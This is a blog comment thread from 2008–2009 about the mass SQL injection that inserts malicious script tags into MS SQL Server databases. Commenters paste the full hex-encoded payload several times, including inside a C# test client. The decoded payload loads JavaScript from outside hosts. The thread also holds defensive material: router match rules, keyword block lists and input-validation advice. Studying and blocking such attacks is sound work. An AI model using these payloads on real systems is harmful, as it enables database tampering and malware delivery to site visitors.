//E205461626C655F437572736F72204645544348204E4558542046524F4D2020546
//1626C655F437572736F7220494E544F2040542C4043205748494C4528404046455
//443485F5354415455533D302920424547494E20657865632827757064617465205
//B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B27272
//23E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F616263
//2E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D27272
//0776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746
//C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782
//E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204
//E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404
//320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415
//445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
// Hangs:
//String inject_str = “GET /Index.htm?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C41
//5245204054207661726368617228323535292C4043207661726368617228343030
//3029204445434C415245205461626C655F437572736F7220435552534F5220464F
//522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F62
//6A6563747320612C737973636F6C756D6E73206220776865726520612E69643D62
//2E696420616E6420612E78747970653D27752720616E642028622E78747970653D
//3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F
//7220622E78747970653D31363729204F50454E205461626C655F437572736F7220
//4645544348204E4558542046524F4D20205461626C655F437572736F7220494E54
//4F2040542C4043205748494C4528404046455443485F5354415455533D30292042
//4547494E20657865632827757064617465205B272B40542B275D20736574205B27
//2B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269
//7074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73
//223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F
//74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22
//687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F73637269
//70743E3C212D2D272727294645544348204E4558542046524F4D20205461626C6
//55F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626
//C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72
//%20AS%20CHAR(4000));EXEC(@S);”;
// Does not hang:
//String inject_str = “GET /Index.htm?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C4
//15245204054207661726368617228323535292C4043207661726AS%20CHAR(4000));”;
// Does not hang, despite being same length as the long query above.
//String inject_str = “GET /Index.htm?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXX”;
// Does not hang (only minor mods to long query).
//String inject_str = “GET /Index.htm?’;DECLARE%20@S%20CHAR(4000);SET%20@S=XAST(Vx4445434C
//415245204054207661726368617228323535292C4043207661726368617228
//3430303029204445434C415245205461626C655F437572736F722043555253
//4F5220464F522073656C65637420612E6E616D652C622E6E616D652066726
//F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686
//5726520612E69643D622E696420616E6420612E78747970653D27752720616
//E642028622E78747970653D3939206F7220622E78747970653D3335206F722
//0622E78747970653D323331206F7220622E78747970653D31363729204F504
//54E205461626C655F437572736F72204645544348204E4558542046524F4D2
//0205461626C655F437572736F7220494E544F2040542C4043205748494C45
//28404046455443485F5354415455533D302920424547494E20657865632827
//757064617465205B272B40542B275D20736574205B272B40432B275D3D5B2
//72B40432B275D2B2727223E3C2F7469746C653E3C73637269707420737263
//3D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2
//F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74
//206C696B6520272725223E3C2F7469746C653E3C736372697074207372633
//D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F
//7363726970743E3C212D2D272727294645544348204E4558542046524F4D2
// //0205461626C655F437572736F7220494E544F2040542C404320454E4420434
//C4F5345205461626C655F437572736F72204445414C4C4F43415445205461
//626C655F437572736F72%20AS%20AHAR(4000));QXEC(QS);”;
//String inject_str = “GET /Index.htm?’;DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(‘update ['+@T+'] set ['+@C+']=['+@C+']+”\”>
August 23rd, 2008 at 3:42 pm
C# app code above got truncated due to the line with the de-encoded CAST(…) string. Here’s the app again, without that line. Sorry about that.
—-
using System;
using System.Net.Sockets;
public class Client
{
static public void pause()
{
Console.WriteLine( “\r\n***** Done *****\r\n” );
Console.ReadKey();
}
static public void Main(string[] Args)
{
TcpClient socketForServer;
try
{
socketForServer = new TcpClient(“www.mysite.com”, 80);
}
catch
{
Console.WriteLine(“Failed to connect to server at {0}:999″, “mysite.com”);
pause();
return;
}
NetworkStream networkStream = socketForServer.GetStream();
System.IO.StreamReader streamReader =
new System.IO.StreamReader(networkStream);
System.IO.StreamWriter streamWriter =
new System.IO.StreamWriter(networkStream);
try
{
string outputString;
// read the data from the host and display it
{
//streamWriter.WriteLine(“GET / HTTP/1.1\r\nHost: http://www.mysite.com\r\n\r\n”);
//SET%20@S=CAST(0×4445434C41524520405420766172636861722832353529
//2C40432076617263686172283430303029204445434C415245205461626C655F
//437572736F7220435552534F5220464F522073656C65637420612E6E616D652C
//622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C75
//6D6E73206220776865726520612E69643D622E696420616E6420612E78747970
//653D27752720616E642028622E78747970653D3939206F7220622E787479706
//53D3335206F7220622E78747970653D323331206F7220622E78747970653D313
//63729204F50454E205461626C655F437572736F72204645544348204E4558542
//046524F4D20205461626C655F437572736F7220494E544F2040542C404320574
//8494C4528404046455443485F5354415455533D302920424547494E206578656
//32827757064617465205B272B40542B275D20736574205B272B40432B275D3D5
//B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633
//D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F736
//3726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696
//B6520272725223E3C2F7469746C653E3C736372697074207372633D226874747
//03A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743
//E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F4
//37572736F7220494E544F2040542C404320454E4420434C4F5345205461626C6
//55F437572736F72204445414C4C4F43415445205461626C655F437572736F72%
//20AS%20CHAR(4000));EXEC(@S);
// Hangs:
//String inject_str = “GET /Index.htm?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C41524
//5204054207661726368617228323535292C4043207661726368617228343030
//3029204445434C415245205461626C655F437572736F7220435552534F52204
//64F522073656C65637420612E6E616D652C622E6E616D652066726F6D20737
//9736F626A6563747320612C737973636F6C756D6E7320622077686572652061
//2E69643D622E696420616E6420612E78747970653D27752720616E642028622
//E78747970653D3939206F7220622E78747970653D3335206F7220622E787479
//70653D323331206F7220622E78747970653D31363729204F50454E205461626
//C655F437572736F72204645544348204E4558542046524F4D20205461626C65
//5F437572736F7220494E544F2040542C4043205748494C45284040464554434
//85F5354415455533D302920424547494E20657865632827757064617465205B
//272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B272
//7223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F61
//62632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2
//D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C
//2F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E7
//66572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727
//294645544348204E4558542046524F4D20205461626C655F437572736F72204
//94E544F2040542C404320454E4420434C4F5345205461626C655F437572736F
//72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHA
//R(4000));EXEC(@S);”;
// Does not hang:
//String inject_str = “GET /Index.htm?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C41
//5245204054207661726368617228323535292C4043207661726AS%20CHAR(4000));”;
// Does not hang, despite being same length as the long query above.
//String inject_str = “GET /Index.htm?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXX”;
// Does not hang (only minor mods to long query).
//String inject_str = “GET /Index.htm?’;DECLARE%20@S%20CHAR(4000);SET%20@S=XAST(Vx4445434C4
//15245204054207661726368617228323535292C40432076617263686172283430303029204
//445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637
//420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C7379736
//36F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653
//D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F722
//0622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626
//C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736
//F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30292
//0424547494E20657865632827757064617465205B272B40542B275D20736574205B272B404
//32B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269707420737263
//3D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F736372697074
//3E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2
//F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782
//E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542
//046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4
//F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F4375727
//36F72%20AS%20AHAR(4000));QXEC(QS);”;
// Does not hang, despite being same length as original, with only the
// CAST(…) contents changed.
//String inject_str = “GET /Index.htm?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444%20AS%20CHAR(4000));EXEC(@S);”;
String inject_str = “GET /Index.htm?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C
//415245204054207661726368617228323535292C40432076617263686172283
//430303029204445434C415245205461626C655F437572736F7220435552534F
//5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D
//207379736F626A6563747320612C737973636F6C756D6E7320622077686572
//6520612E69643D622E696420616E6420612E78747970653D27752720616E642
//028622E78747970653D3939206F7220622E78747970653D3335206F7220622E
//78747970653D323331206F7220622E78747970653D31363729204F50454E205
//461626C655F437572736F72204645544348204E4558542046524F4D20205461
//626C655F437572736F7220494E544F2040542C4043205748494C45284040464
//55443485F5354415455533D302920424547494E206578656328277570646174
//65205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275
//D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A
//2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3
//C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725
//223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F616
//2632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D
//272727294645544348204E4558542046524F4D20205461626C655F437572736
//F7220494E544F2040542C404320454E4420434C4F5345205461626C655F4375
//72736F72204445414C4C4F43415445205461626C655F437572736F72%20AS
//%20CHAR(4000));EXEC(@S);”;
String final_str = inject_str + ” HTTP/1.1\r\nHost: http://www.mysite.com\r\n\r\n”;
Console.WriteLine(final_str);
streamWriter.WriteLine( final_str );
streamWriter.Flush();
for (; ; )
{
if (streamReader.Peek() != -1)
{
outputString = streamReader.ReadLine();
if (outputString != null)
{
Console.WriteLine(outputString);
}
else
{
break;
}
}
else
{
break;
}
}
}
}
catch
{
Console.WriteLine(“Exception reading from Server”);
pause();
}
// tidy up
networkStream.Close();
pause();
}
}
August 23rd, 2008 at 4:09 pm
Tom39 here again… After digging some more, something else is interesting here… When I manually send the “real” SQL injection string (the one that “hangs” in the code in my previous post), not only does the request time out, but the server log never even shows the request came in. Could it be that something between my network and my server’s network is actually looking for this exact request string and filtering it? Very bizarre…
-Tom39
August 26th, 2008 at 10:44 am
Tom39 that sounds very strange. Perhaps there’s a timeout set on the server and the queries are exceeding that time? Did you try running them with SQL Enterprise Manager?
vabuk: We think your asking for more information on preventing the attack. Essentially what you need to do is when the search button is clicked and you take the text in from the input box you need to ensure that text is safe. Otherwise passing it to your database server would make you vulnerable to various forms of input attacks.
Example: If your doing something like Select * from Content where body like ‘%searchText%’; then you would be at risk for an attack as all the attacker would have to do is pass in a single quote and a semi colon to escape your current query and pass in their own query.
August 26th, 2008 at 11:18 am
devit: That’s just it — nothing is ever executing the queries (any query). That is, my http://www.mysite.com site has no dynamic pages — the default document is a static .htm file. As such, there is no “risk” of an injection attack, because nothing is ever being done with any database… which is why I’m so puzzled here! While I haven’t taken the time to use a network traffic analyzer and look to see if the server is actually receiving the packets, the summed-up scenario on my end is:
* Have a site, http://www.mysite.com.
* Site consists of only a single test page, pure HTML, nothing dynamic. Default (only) document is an .htm extension (Index.htm). No database access, no nothing.
* Pointing a browser to [or even making a progmatic (C#) GET request to] http://www.mysite.com/Index.htm?‘;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4
445434C415245204054207661726368617228323535292C404320766172636861722834303030
29204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C656
37420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C73797363
6F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D277
52720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78
747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F43757
2736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F
2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657
865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B4043
2B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F61626
32E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207768657265
20272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207
372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970
743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7
220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F7220444541
4C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
hangs the request (i.e., the browser/C# app/etc. sit there for minutes, and then time out).
* Pointing a browser/app to
http://www.mysite.com/Index.htm?‘;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4
444444444444444444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444444444444444
4444444444444444444444444%20AS%20CHAR(4000));EXEC(@S);
does NOT time out. Same length data, same format, etc. Just different contents of CAST(…). But, then the real question is: WHY does this matter? If nothing is being done with the query string, why does one hang and the other not?
I’d be curious to know if anyone else experiences the same thing if they try the same two query strings on their server.
Any feedback is welcomed.
August 27th, 2008 at 10:26 pm
[...] There is another excellent article with examples by Devit!. [...]
August 28th, 2008 at 9:41 pm
Hi there folks.
This blog has been very informative. Thanks everyone for the interesting information. My site got hit by this 4 times over 4 weeks. Usually mid morning (EST) on a Friday. I’m bracing for tomorrow.
After the first attack, I went and bought a set of repair scripts from PortableGeek, which were great. I wish I’d known about this blog though.
I have a 2 questions though.
Question 1:
For CF, I’m seeing use of the cfqueryparam recommended a lot. I haven’t done this much, but I do a check on any numeric param that gets passed to a sql statement. I use isNumeric to see if it’s a number. If it is, then I pass it through. If it isn’t, I cfset the param to 0 (zero) and then I don’t execute the sql query at all, and return an error.
Is this still vulnerable?
Question 2:
It’s hard to remove EXEC permission from my sql user because I use stored procs. Should I redo all my code to use plain sql statements instead of stored procs?
thanks
September 5th, 2008 at 9:42 am
Iain:
#1 – No – if you’re verifying its a number then only a number can be passed through.
#2 – No – Remember to validate the data before you pass it to your stored procedures – if you have stored procedures that are accepting text from a “post” or a “get” variable you’ll want to ensure you’re cleaning that text. (Remember: It’s best to only allow specific characters (a-z,0-9,spaces,comms,etc..) and strip all other characters as opposed to stripping a specific set of characters you know may be harmful)
Devit
September 8th, 2008 at 12:51 pm
I have a classic asp website which has been hit several times by this SQL attack through our pages with the ? in the dynamic URL. Would URL re-writing stop the attack.
September 16th, 2008 at 7:52 am
Hey Tom, I’m a proud C# Developer too
I’m 90% certain your problem is in your ISAPI REWRITE filter.
Which one are you using BTW?
It’s not the filter itself, it might be the regex string. You are sending to the rewrite filter a REGEX query that is hanging the filter, probably by accidentally forcing a neverending loop. Regex are tricky, and you have to carefully implement them in a Rewrite Filter.
It would be lots easier if you drop the ISAPI REWRITE idea and look for the attacking string in the Application_BeginRequest event on the Global.asax file of your ASP.NET application. Solve it there.
Please drop me a line as I don’t think I’ll be checking this blog often
Sincerely,
Agustin Garzon
agustingarzon [ a t ] yahoo [ do t ] com
September 23rd, 2008 at 6:40 am
Really it very good solution but the type of ntext in db can’t be slove by this query
DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec(‘update ['+@T+'] set ['+@C+']=replace(['+@C+'],””>
September 24th, 2008 at 8:40 pm
Obviously good coding following guideline on parameter sanitisation and white listing rather than black listing user supplied content is the best approach however if you have lots of large old systems then rewriting them may not be feasible.
See
http://blog.strictly-software.com/2008/09/recovering-from-sql-injection-hack.html
for a list of plasters that are quick to implement and work (reduced logged hacks by 95%)
-Deny webuser access to system views such as sysobjects,syscolumns if not required by site.
-Use a server wide ISAPI URL rewrite ini file to detect and bounce hackers before any application code is run.
-If you don’t have ISAPI rewrite available then include a global include file that uses similar regular expressions to detect common fingerprints and bounce user to a banned page.
Also a script to check the database to determine how much data has been affected and either output or run the update statements needed to fix it is at
http://blog.strictly-software.com/2008/09/script-find-text-in-database.html
Thanks
October 2nd, 2008 at 7:27 am
Found this in the logs. How do I unecrypt it?
DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C4152452040542076617
26368617228323535292C40432076617263686172283430303029204445434C415245205
461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D6
52C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7
3206220776865726520612E69643D622E696420616E6420612E78747970653D277527206
16E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E787
47970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F4
37572736F72204645544348204E4558542046524F4D20205461626C655F437572736F722
0494E544F2040542C4043205748494C4528404046455443485F5354415455533D3029204
24547494E20657865632827757064617465205B272B40542B275D20736574205B272B404
32B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2
F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F73637269
70743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F7420
6C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A
2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F73637
26970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F4
37572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572
736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));
EXEC(@S);
October 3rd, 2008 at 10:39 am
Hey Pete,
Any easy way to translate that is to first delete EXEC(@S); and then change all of the %20’s to spaces.
After that add a print @s; on the end and you should be able to see the results when you execute it.
Just remember to remove the EXEC(@S); so the script isn’t getting executed on your database server.
Good Luck.
October 6th, 2008 at 4:27 pm
Thanks devit
October 12th, 2008 at 9:15 pm
Help! I’m getting killed! I’ve attempted to have system views blocked but for some reason it won’t take. I can still use them from the web db user account. I’m also dealing with javascript being appended to some files. We’ve been hit five or six times today. File permissions are all read only for internetuser, WUSR and Interactive with write deny set. That hasn’t helped.
I’ve run ClamWin, WIndows malware scan, and Malwarebytes on the host machine with updated definitions and none found any virus.
Also it seems the javascript appends are no longer leaving any sort of record in the logs. (It’s not SQL injection, though we were hit with SQL injection a few days ago) The javascript calls to http://acglgoa.com/h.js
I’m using ISAPI_Rewrite to filter EXEC( from http requests to stop SQL injection.
p.s. I’ve found this http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html to be of assistance in translating attacks in hex to ascii.
October 13th, 2008 at 12:40 pm
So far no successful file append or SQL injection attacks today.
I’ve denied writes to System, Network. Network Service, IIS_WPG, Interactive, Internet Guest Account and Users.
We haven’t had a successful db attack in a week now.
October 13th, 2008 at 8:32 pm
hackers are back and were able to overwrite a file despite permissions denying write
October 20th, 2008 at 1:18 am
hi,
this side Aman….my blog is hacked and i want to get it back….plz tell me any sloution if you have ..plz help me.
October 25th, 2008 at 5:44 am
We blocked SQL injections at our Cisco router (anything running Cisco IOS should block it). We built a class-map called http-hacks, set it to null route and put:
Match protocol http url “*;DECLARE*”
Match protocol http url “*DECLARE%20*”
Match protocol http url “*=CAST*”
We applied the class-map to the external facing interface (incoming). You could also apply it on the other interface as well to stop any outgoing attacks if you are worried about such things.
in it, drops all incoming http containing those. You can do similar for nearly any http request. We did the same thing with the Storm worm crud and a few other things we got tired of script kiddies trying to hit (like cmd.exe, default.ida, etc.)
November 27th, 2008 at 9:26 am
Hi All,
I just wanted to share my work around for this type of sql injection. I applied security at multiple places. First i created a method which takes value of querystring and checks for some malicious text like “Declare”,”Cast”,”Convert”,”Var”,”‘”,”,”",”Drop”,”Delete”,”Update”,”Insert”,”Create”,”Set”,”Database”. If this function finds any of these malicious codes, it will first get an IP# of the requesting machine and stroes it to the MaliciousIP table and rejects the request by just refreshing the page. Showing some kind of message may provide them some kind of hints which they can make use of.
The IP# which belongs to MaliciousIP would be allowed to enter same data only two more times, after that it will be blocked forever. Again not messages. This helps us to frustrate them a bit. And this is what our tsk is, to frustrate them and make them leave wrong attempt.
The third security step i took is using a “Check” constraint. I have some very important tables in my database, which i needed to make sure should not be affected at all. I attached “Check” constraint with the help of expression including keywords like “”,”/”,”.js”,”!”,”–”. These chck constraint can reject data coming in with these words.
Similar kind of security blocks you can follow according to your requirement. I would appreciate suggestions if any is available for this concern.
Hackers are among us, and we can defeat them, just keep your spirit up.
Thanks
Adil
December 1st, 2008 at 12:32 pm
This very selfsame injection attack, that was the impetus for me writing a new breed of php and mysql website protecting script, to protect my own website assets.
I am now sharing the script with the world, licensed GNU/GPL V.2 and it does much more than just detect this attack. It also does IP range banning, hostname banning, keyword banning, and a few other cool tricks to protect your website. Give it an eyeball at http://zaphodb777.dyndns.org/zbblockpage.php , and discuss it at http://zaphodb777.dyndns.org/forum.
Thanks!
August 18th, 2009 at 10:08 am
informative for me, like that
[url=http://www.injectable-filler.com]injectable filler
September 10th, 2009 at 8:28 am
Hi! I was surfing and found your blog post… nice! I love your blog.
Cheers! Sandra. R.
October 29th, 2009 at 5:37 am
hi,
I am a QA person and after reading your post i applied to above code to some website created in PHP, i am testing these days (server is placed soemwhere else).
